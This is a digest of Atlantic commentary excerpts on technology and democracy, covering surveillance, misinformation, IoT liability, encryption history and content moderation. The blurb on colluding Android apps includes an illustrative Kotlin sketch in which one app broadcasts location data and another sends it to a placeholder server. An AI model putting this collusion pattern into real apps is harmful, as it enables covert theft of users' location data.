Atlantic, The

The Antidote to Authoritarianism

[Commentary] The open internet has decentralized the media and allowed black activists in a modern movement against police and state violence to bypass discriminatory media gatekeepers and reveal the extent of the state’s abuse. When ordinary people capture shocking video footage of police officers fatally shooting black citizens, for example, it is more difficult for Americans to ignore the realities of racial injustice.

Technology has always been a double-edged sword for black people in America and beyond. On the one hand, it can pose a grave threat; on the other, it can offer great opportunity. Our survival, and our democracy, require us to reject high-tech policing and usher in the strongest net neutrality rules available. The open internet can represent the future of digital democracy, or we can use technology to continue encoding inequality into our modern world.

[Malkia Cyril is the founder and executive director of the Center for Media Justice.]

You Cannot Encrypt Your Face

[Commentary] From the Boston Tea Party to the printing of Common Sense, the ability to dissent—and to do it anonymously—was central to the founding of the United States. Anonymity was no luxury: It was a crime to advocate separation from the British Crown. It was a crime to dump British tea into Boston Harbor. This trend persists. Our history is replete with moments when it was a “crime” to do the right thing, and legal to inflict injustice.

The latest crime-fighting tools, however, may eliminate people’s ability to be anonymous. Historically, surveillance technology has tracked our technology: our cars, our computers, our phones. Face recognition technology tracks our bodies. And unlike fingerprinting or DNA analysis, face recognition is designed to identify us from far away and in secret.

[Alvaro Bedoya is the founding executive director of the Center on Privacy & Technology at Georgetown Law. ]

The Age of Misinformation

[Commentary] There are two big problems with America’s news and information landscape: concentration of media, and new ways for the powerful to game it.

First, we increasingly turn to only a few aggregators like Facebook and Twitter to find out what’s going on in the world, which makes their decisions about what to show us impossibly fraught. Those aggregators draw, opaquely but consistently, from largely undifferentiated sources to figure out what to show us. They are, they often remind regulators, only aggregators rather than content originators or editors.

Second, the opacity with which these platforms offer us news and set our information agendas means that we don’t have cues about whether what we see is representative of sentiment at large, or, for that matter, of anything, including expert consensus. But expert outsiders can still game the system to ensure disproportionate attention to the propaganda they want to inject into public discourse. Those users might employ bots, capable of numbers that swamp actual people, and of persistence that ensures their voices are heard above all others while still appearing to be humbly part of the real crowd. What to do about it? We must realize that the market for vital information is not merely a market.

[Jonathan Zittrain is a professor at Harvard Law School and the Kennedy School of Government.]

Technology Is Changing Democracy as We Know It

We asked more than two dozen people who think deeply about the intersection of technology and civics to reflect on two straightforward questions: Is technology hurting democracy? And can technology help save democracy? We’ll publish a new essay every day for the next several weeks, beginning with Shannon Vallor’s “Lessons From Isaac Asimov’s Multivac.”

The Internet of Things Needs a Code of Ethics

An interview with Francine Berman, a computer-science professor at Rensselaer Polytechnic Institute and a longtime expert on computer infrastructure.

In October, when malware called Mirai took over poorly secured webcams and DVRs, and used them to disrupt internet access across the United States, I wondered who was responsible. Not who actually coded the malware, or who unleashed it on an essential piece of the internet’s infrastructure—instead, I wanted to know if anybody could be held legally responsible. Could the insecure devices’ manufacturers be held liable for the damage their products caused? Right now, in this early stage of connected devices’ slow invasion into our daily lives, there’s no clear answer to that question. That’s because there’s no real legal framework that would hold manufacturers responsible for critical failures that harm others. As is often the case, the technology has developed far faster than policies and regulations.

The Problem With WikiTribune

[Commentary] The larger problem with WikiTribune is this: Someone who is paid for doing journalistic work cannot be considered “equals” with someone who is unpaid. And promoting the idea that core journalistic work should be done for free, by volunteers, is harmful to professional journalism.

The difference between a professional and a hobbyist isn’t always measurable in skill level, but it is quantifiable in the time and other resources necessary to complete a job. This is especially true in journalism, where figuring out the answer to a question often requires stitching together several pieces of information from different sources—not just information sources but people who are willing to be questioned to clarify complicated ideas.

When Apps Secretly Team Up to Steal Your Data

Pairs of Android apps installed on the same smartphone have ways of colluding to extract information about the phone’s user, which can be difficult to detect. Security researchers don’t have much trouble figuring out if a single app is gathering sensitive data and secretly sending it off to a server somewhere. But when two apps team up, neither may show definitive signs of thievery alone. And because of the enormous number of possible app combinations, testing for collusion is a herculean task. A recently released study developed a new way to tackle this problem—and found more than 20,000 app pairings that leak data.
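
To make the pattern concrete, here is a minimal, hypothetical Kotlin sketch of the kind of collusion described: one app holds a location permission but never touches the network, while a second app holds only network access and forwards whatever the first one broadcasts. The package names, action string, and server URL are invented for illustration, and the study’s actual detection technique is not reproduced here.

```kotlin
import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
import java.net.HttpURLConnection
import java.net.URL
import kotlin.concurrent.thread

// App A (hypothetical "com.example.flashlight"): holds ACCESS_FINE_LOCATION
// but no INTERNET permission, so on its own it never talks to a server.
class LocationLeaker(private val context: Context) {
    fun shareLocation(lat: Double, lon: Double) {
        // Implicit broadcast: any app registered for this action can receive it.
        val intent = Intent("com.example.ACTION_LOCATION_UPDATE").apply {
            putExtra("lat", lat)
            putExtra("lon", lon)
        }
        context.sendBroadcast(intent)
    }
}

// App B (hypothetical "com.example.wallpaper"): holds only INTERNET permission
// and never reads location itself; it registers this receiver for the action above.
class CollusionReceiver : BroadcastReceiver() {
    override fun onReceive(context: Context, intent: Intent) {
        val lat = intent.getDoubleExtra("lat", Double.NaN)
        val lon = intent.getDoubleExtra("lon", Double.NaN)
        // Forward the received coordinates to a placeholder server off the main thread.
        thread {
            val url = URL("https://collect.example.invalid/loc?lat=$lat&lon=$lon")
            (url.openConnection() as HttpURLConnection).apply {
                requestMethod = "GET"
                responseCode   // triggers the request
                disconnect()
            }
        }
    }
}
```

Because the permission-sensitive read and the network exfiltration happen in different packages, analyzing either app in isolation turns up nothing conclusive, which is the gap that pairwise testing tries to close.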

The Founding Fathers Encrypted Secret Messages, Too

As a youth in the Virginia colony, Thomas Jefferson encrypted letters to a confidante about the woman he loved. While serving as the third president of the newly formed United States, he tried to institute an impossibly difficult cipher for communications about the Louisiana Purchase. He even designed an intricate mechanical system for coding text that was more than a century ahead of its time.

Cryptography was no parlor game for the idle classes, but a serious business for revolutionary-era statesmen who, like today’s politicians and spies, needed to conduct their business using secure messaging. Codes and ciphers involving rearranged letters, number substitutions, and other now-quaint methods were the WhatsApp, Signal, and PGP keys of the era.
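
As a rough, modern illustration of the kind of keyed letter-substitution these statesmen worked by hand, the Kotlin toy below shifts each letter of a message by a repeating key word, in the style of a Vigenère cipher from roughly that era. It is a stand-in for the general idea, not a reconstruction of any cipher Jefferson actually used, and the message and key are made up.

```kotlin
// Toy Vigenère-style cipher: each letter is shifted by the corresponding letter
// of a repeating key word; non-letters pass through unchanged.
fun vigenere(text: String, key: String, decrypt: Boolean = false): String {
    val k = key.uppercase().filter { it in 'A'..'Z' }
    var i = 0
    return text.uppercase().map { c ->
        if (c !in 'A'..'Z') c
        else {
            val shift = (k[i++ % k.length] - 'A').let { if (decrypt) -it else it }
            'A' + ((c - 'A' + shift + 26) % 26)
        }
    }.joinToString("")
}

fun main() {
    val ciphertext = vigenere("MEET AT THE HARBOR", "LIBERTY")
    println(ciphertext)                                       // scrambled message
    println(vigenere(ciphertext, "LIBERTY", decrypt = true))  // recovers the original
}
```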

What Happens When the President Is a Publisher, Too?

What everyone actually knows, or should by now, is that while President Donald Trump claims to hate “the media,” he is himself an active publisher. And when the Trump Administration talks about the press as “the opposition,” that may be because President Trump is himself competing with traditional outlets in the same media environment, using the same publishing tools. It’s no wonder there was so much speculation about President Trump possibly launching his own TV network to rival Fox. It’s also no wonder that President Trump recently suggested he owes his presidency to Twitter, which he has used to blast critics and spout conspiracy theories since at least 2011.

Social Media’s Silent Filter

Thus far, much of the post-election discussion of social-media companies has focused on algorithms and automated mechanisms that are often assumed to undergird most content-dissemination processes online. But algorithms are not the whole story. In fact, there is a profound human aspect to this work. I call it commercial content moderation, or CCM.